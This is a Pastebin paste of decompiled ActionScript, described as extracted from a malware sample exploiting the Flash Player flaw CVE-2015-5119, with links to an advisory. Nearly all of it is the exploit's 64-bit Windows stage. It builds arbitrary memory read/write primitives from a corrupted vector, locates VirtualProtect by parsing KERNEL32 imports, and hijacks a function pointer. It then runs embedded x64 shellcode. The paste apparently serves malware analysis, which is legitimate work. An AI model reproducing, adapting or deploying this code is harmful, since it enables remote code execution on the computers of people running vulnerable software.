Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Extracted ActionScript for Win x64 from e747df46e21036505780f2f7e48775147d815c3591f1c91514328a36aa84b9de also known as: CVE-2015-5119
- https://helpx.adobe.com/security/products/flash-player/apsa15-03.html
- https://twitter.com/bartblaze/status/618761630806110208
- package
- {
- import flash.utils.Endian;
- class ShellWin64 extends MyClass
- {
- static var _v:Vector.<uint>;
- static var _vAddr:Number;
- static var _base:Number;
- static var _baseMax:Number;
- static var _baseOld:Number;
- static var _mc:MyClass2;
- static var _mcOffs:uint;
- static var N32:Number = Math.pow(2,32);
- static var _x64:Vector.<uint> = Vector.<uint>([3.296938069E9,3.96855104E9,1700221267,621054792,96,406883144,272665416,1207995208,2.336751755E9,1133195352,3.623962684E9,8949899,21495808,544902106,1222574408,126601521,2.178416968E9,1701987128,2.166453601E9,1936919416,410320961,1210335883,3.071268865E9,2055948292,3.741403164E9,1216822411,216791809,80184136,1002569544,3.33002145E9,1222674760,581761,692584448,1213223108,1342195085,410881352,3.224455255E9,3513,2.873684736E9,1746421191,3.892314112E9,9,1668047203,1702389038,826825216,1364283849,3.381217617E9,1221101897,1210117251,2.202588159E9,3.242741956E9,2.20253488E9,1499006656,1607205192,2.370329433E9,32933,2.428722432E9]);
- {
- N32 = Math.pow(2,32);
- _x64 = Vector.<uint>([3.296938069E9,3.96855104E9,1700221267,621054792,96,406883144,272665416,1207995208,2.336751755E9,1133195352,3.623962684E9,8949899,21495808,544902106,1222574408,126601521,2.178416968E9,1701987128,2.166453601E9,1936919416,410320961,1210335883,3.071268865E9,2055948292,3.741403164E9,1216822411,216791809,80184136,1002569544,3.33002145E9,1222674760,581761,692584448,1213223108,1342195085,410881352,3.224455255E9,3513,2.873684736E9,1746421191,3.892314112E9,9,1668047203,1702389038,826825216,1364283849,3.381217617E9,1221101897,1210117251,2.202588159E9,3.242741956E9,2.20253488E9,1499006656,1607205192,2.370329433E9,32933,2.428722432E9]);
- }
- function ShellWin64()
- {
- super();
- }
- static function Hex(param1:Number) : String
- {
- if(param1 >= 0 && param1 <= 9)
- {
- return param1.toString();
- }
- return "0x" + param1.toString(16);
- }
- static function Init(param1:Vector.<uint>, param2:uint, param3:MyClass2, param4:uint) : Boolean
- {
- _v = param1;
- _mc = param3;
- _mcOffs = param4;
- _vAddr = Get64(param4,4.2949632E9) - param2;
- _baseOld = Get64(param4 - 10);
- param1[6] = 4.294967295E9;
- param1[7] = 4.294967294E9;
- param3.endian = Endian.LITTLE_ENDIAN;
- Set64(param4 - 10,_vAddr);
- _base = 0;
- _baseMax = 4.29496728E9;
- var _loc5_:uint = param3.length;
- return _loc5_ == param1[7];
- }
- static function CleanUp() : *
- {
- Set32(_vAddr - 16,_vLen);
- _v[6] = 0;
- _v[7] = 0;
- }
- static function Num(param1:uint, param2:uint) : Number
- {
- var _loc3_:Number = param2;
- if(_loc3_ != 0)
- {
- _loc3_ = _loc3_ * N32;
- }
- _loc3_ = _loc3_ + param1;
- return _loc3_;
- }
- static function Hi(param1:Number) : uint
- {
- return uint(Math.floor(param1 / N32) & N32 - 1);
- }
- static function Low(param1:Number) : uint
- {
- return uint(param1 & N32 - 1);
- }
- static function Get64(param1:uint, param2:uint = 4.294967295E9) : Number
- {
- return Num(_v[param1] & param2,_v[param1 + 1]);
- }
- static function Set64(param1:uint, param2:Number) : *
- {
- _v[param1] = Low(param2);
- _v[param1 + 1] = Hi(param2);
- }
- static function SetBase(param1:Number) : *
- {
- if(param1 < _base || param1 >= _baseMax)
- {
- Set64(4,param1);
- _base = param1;
- _baseMax = param1 + 4.29496728E9;
- }
- }
- static function Get32(param1:Number) : uint
- {
- if(param1 < 65536)
- {
- throw new Error("");
- }
- SetBase(param1);
- _mc.position = uint(param1 - _base & N32 - 1);
- return _mc.readUnsignedInt();
- }
- static function Set32(param1:Number, param2:uint) : *
- {
- if(param1 < 65536)
- {
- throw new Error("");
- }
- SetBase(param1);
- _mc.position = uint(param1 - _base & N32 - 1);
- _mc.writeUnsignedInt(param2);
- }
- static function Get(param1:Number) : Number
- {
- if(param1 < 65536)
- {
- throw new Error("");
- }
- SetBase(param1);
- _mc.position = uint(param1 - _base & N32 - 1);
- var _loc2_:uint = _mc.readUnsignedInt();
- var _loc3_:uint = _mc.readUnsignedInt();
- return Num(_loc2_,_loc3_);
- }
- static function Set(param1:Number, param2:Number) : *
- {
- if(param1 < 65536)
- {
- throw new Error("");
- }
- SetBase(param1);
- _mc.position = uint(param1 - _base & N32 - 1);
- _mc.writeUnsignedInt(Low(param2));
- _mc.writeUnsignedInt(Hi(param2));
- }
- static function GetAddr(param1:Object) : Number
- {
- _mc.o1 = param1;
- return Get64(_mcOffs) - 1;
- }
- static function Dump(param1:Number, param2:uint) : String
- {
- var _loc4_:uint = 0;
- var _loc3_:* = "";
- while(_loc4_ < param2)
- {
- _loc3_ = _loc3_ + (Get(param1).toString(16) + ",");
- if(_loc4_ % 8 == 7)
- {
- _loc3_ = _loc3_ + "<br>";
- }
- _loc4_++;
- var param1:Number = param1 + 8;
- }
- return _loc3_;
- }
- static function FindVP() : Number
- {
- var _loc1_:* = NaN;
- var _loc2_:uint = 0;
- var _loc3_:* = NaN;
- var _loc4_:uint = 0;
- var _loc5_:Vector.<uint> = null;
- var _loc6_:* = NaN;
- var _loc7_:* = NaN;
- var _loc8_:* = NaN;
- var _loc9_:uint = 0;
- try
- {
- _loc1_ = Get64(_mcOffs - 4,4.29490176E9) - 8388608;
- while(_loc2_ < 240)
- {
- if(uint(Get32(_loc1_) & 65535) == 23117)
- {
- break;
- }
- _loc2_++;
- _loc1_ = _loc1_ - 65536;
- }
- if(_loc2_ >= 240)
- {
- throw new Error("");
- }
- _loc3_ = _loc1_ + Get32(_loc1_ + 60);
- if(Get32(_loc3_) != 17744)
- {
- throw new Error("");
- }
- _loc4_ = Get32(_loc3_ + 148);
- _loc3_ = _loc1_ + Get32(_loc3_ + 144);
- _loc5_ = new Vector.<uint>(4);
- _loc2_ = 0;
- while(_loc2_ < _loc4_)
- {
- _loc8_ = _loc1_ + Get32(_loc3_ + _loc2_ + 3 * 4);
- _loc9_ = 0;
- while(_loc9_ < 4)
- {
- _loc5_[_loc9_] = Get32(_loc8_);
- _loc9_++;
- _loc8_ = _loc8_ + 4;
- }
- if(MyUtils.IsEqual(_loc5_,"KERNEL32.DLL"))
- {
- _loc6_ = Get32(_loc3_ + _loc2_);
- _loc7_ = Get32(_loc3_ + _loc2_ + 4 * 4);
- break;
- }
- _loc2_ = _loc2_ + 5 * 4;
- }
- if(_loc6_ == 0 || _loc7_ == 0)
- {
- throw new Error("");
- }
- _loc5_.length = 5;
- _loc6_ = _loc6_ + _loc1_;
- _loc2_ = 0;
- while(_loc2_ < 384)
- {
- _loc8_ = Get(_loc6_);
- if(_loc8_ == 0)
- {
- throw new Error("");
- }
- _loc8_ = _loc8_ + _loc1_;
- _loc9_ = 0;
- while(_loc9_ < 5)
- {
- _loc5_[_loc9_] = Get32(_loc8_);
- _loc9_++;
- _loc8_ = _loc8_ + 4;
- }
- if(MyUtils.IsEqual(_loc5_,"VIRTUALPROTECT",2) && MyUtils._bArr.readByte() == 0)
- {
- return Get(_loc1_ + _loc7_ + _loc2_ * 8);
- }
- _loc2_++;
- _loc6_ = _loc6_ + 8;
- }
- }
- catch(e:Error)
- {
- }
- return 0;
- }
- static function Payload(... rest) : *
- {
- }
- static function CallVP(param1:Number) : Number
- {
- var _loc12_:uint = 0;
- Payload();
- var _loc2_:Array = new Array(4);
- Payload.apply(null,_loc2_);
- var _loc3_:Number = GetAddr(Payload);
- var _loc4_:Number = Get(Get(Get(_loc3_ + 16) + 40) + 8) + (_isDbg?288:264);
- var _loc5_:Number = Get(_loc4_);
- var _loc6_:Number = Get(_loc3_ + 56);
- var _loc7_:Number = Get(_loc3_ + 64);
- var _loc8_:Number = Get(_loc5_ - 8);
- var _loc9_:uint = _x64.length;
- var _loc10_:Vector.<uint> = new Vector.<uint>(Math.max(768,_loc9_));
- var _loc11_:Number = GetAddr(_loc10_);
- _loc11_ = _loc11_ + (_isDbg?56:48);
- if(Get(_loc11_) < 65536)
- {
- _loc11_ = _loc11_ - 8;
- }
- _loc11_ = Get(_loc11_) + 16;
- _gc.push(_loc10_);
- while(_loc12_ < 256 - 2)
- {
- _loc10_[_loc12_ + 2] = Get32(_loc5_ + _loc12_ * 4);
- _loc12_++;
- }
- var _loc13_:Number = Get(_loc5_) - 64 * 4;
- _loc12_ = 0;
- while(_loc12_ < 512)
- {
- _loc10_[_loc12_ + 256] = Get32(_loc13_ + _loc12_ * 4);
- _loc12_++;
- }
- _loc10_[0] = Low(_loc8_);
- _loc10_[1] = Hi(_loc8_);
- _loc10_[2] = Low(_loc11_ + 320 * 4);
- _loc10_[3] = Hi(_loc11_ + 320 * 4);
- _loc10_[320 + 12] = Low(param1);
- _loc10_[320 + 13] = Hi(param1);
- Set(_loc3_ + 56,_loc10_.length * 4);
- Set(_loc3_ + 64,64);
- var _loc14_:Number = GetAddr(_loc2_);
- _loc8_ = Get(_loc14_);
- Set(_loc4_,_loc11_ + 8);
- Payload.apply(null,_loc2_);
- Set(_loc4_,_loc5_);
- Set(_loc3_ + 56,_loc6_);
- Set(_loc3_ + 64,_loc7_);
- _loc7_ = Get(_loc14_);
- Set(_loc14_,_loc8_);
- if(_loc8_ == _loc7_)
- {
- throw new Error("");
- }
- _loc12_ = 0;
- while(_loc12_ < _loc9_)
- {
- _loc10_[_loc12_] = _x64[_loc12_];
- _loc12_++;
- }
- return _loc11_;
- }
- static function Exec() : *
- {
- var _loc1_:* = NaN;
- var _loc2_:* = NaN;
- var _loc3_:* = NaN;
- var _loc4_:* = NaN;
- var _loc5_:* = undefined;
- try
- {
- _loc1_ = FindVP();
- if(_loc1_ == 0)
- {
- throw new Error("vpAddr == 0");
- }
- _loc2_ = CallVP(_loc1_);
- _loc3_ = GetAddr(Payload);
- _loc3_ = Get(Get(_loc3_ + 56) + 16) + 8;
- _loc4_ = Get(_loc3_);
- Set(_loc3_,_loc2_);
- _loc5_ = Payload.call(null);
- Set(_loc3_,_loc4_);
- }
- catch(e:Error)
- {
- }
- CleanUp();
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement